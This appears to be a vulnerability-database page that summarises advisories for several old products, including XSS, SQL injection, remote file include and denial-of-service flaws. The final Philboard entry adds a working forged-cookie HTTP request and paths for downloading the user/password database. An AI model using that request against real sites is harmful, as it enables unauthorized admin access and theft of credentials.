Explore Vulnerabilities

Explore all Exploits:

Desktop Orbiter 2.01 Denial of Service

A denial of service vulnerability has been reported for Desktop Orbiter. The vulnerability exists due to the way the application handles connections. Specifically, for every open connection, a snapshot preview of the desktop is loaded into memory. Thus, numerous connections would result in a consumption of all available memory resources.

Bypassing cPanel Formail-clone Local Domain Checks

It has been reported that cPanel is prone to an issue where a remote attacker may bypass cPanel Formail-clone local domain checks and have untrusted e-mail delivered in the context of the vulnerable host. This issue may be exploited by an attacker to use the vulnerable host as an open relay.

Activity Monitor 2002 Denial of Service Vulnerability

A vulnerability has been reported for Activity Monitor 2002 that may be exploited to remotely trigger a denial of service condition. The problem occurs while handling data received from hosts that are not registered in the Activity Monitor 'monitoring list'. A remote attacker may exploit this vulnerability to crash a remote Activity Monitor service, effectively triggering a persistent denial of service condition.

Zeus Web Server Cross Site Scripting Vulnerability

The Zeus Web Server contains a web-based administration interface that is vulnerable to cross-site scripting attacks. Due to insufficient sanitization of user-supplied input, it is possible for an attacker to construct a malicious link containing arbitrary HTML and script code, which will be executed in the web client of a user who visits the malicious link. It should be noted that the user must authenticate with the administrative interface for the attack to succeed.

Remote File Include Vulnerability in P-Synch

A remote file include vulnerability has been reported for P-Synch, due to insufficient sanitization of some user-supplied URI variables. An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for a specific URI parameter.

P-Synch Cross-Site Scripting Vulnerability

P-Synch does not adequately filter HTML code from URL parameters, making it prone to cross-site scripting attacks. Code will be executed in the security context of the system running P-Synch. This may enable a remote attacker to steal cookie-based authentication credentials from legitimate users. Other attacks are also possible.

Geeklog SQL Injection Vulnerability

Geeklog is reported to be prone to SQL injection attacks during authentication. This is due to insufficient sanitization of cookie values, which could permit an attacker to inject SQL code. This issue could be exploited to compromise Geeklog or to potentially launch attacks against the database, allowing for disclosure of sensitive information or other consequences.

Authentication Bypass in Philboard

A vulnerability has been discovered in the 'philboard_admin.asp' script used by Philboard. The problem occurs during authentication and may allow an attacker to gain unauthorized administrative access. The issue presents itself when handling cookie-based authentication credentials. By gaining administrative access, an attacker may be capable of carrying out a variety of attacks. It should be noted that although this vulnerability has been reported to affect Philboard version 1.14, previous versions might also be affected.

Use telnet and open target on port 80:

GET /board/philboard_admin.asp HTTP/1.0
Host: example.com
Cookie: philboard_admin=True;

Download the database (users and password). Usually, the database location can be found and the database downloaded from:

http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb

Recent Exploits: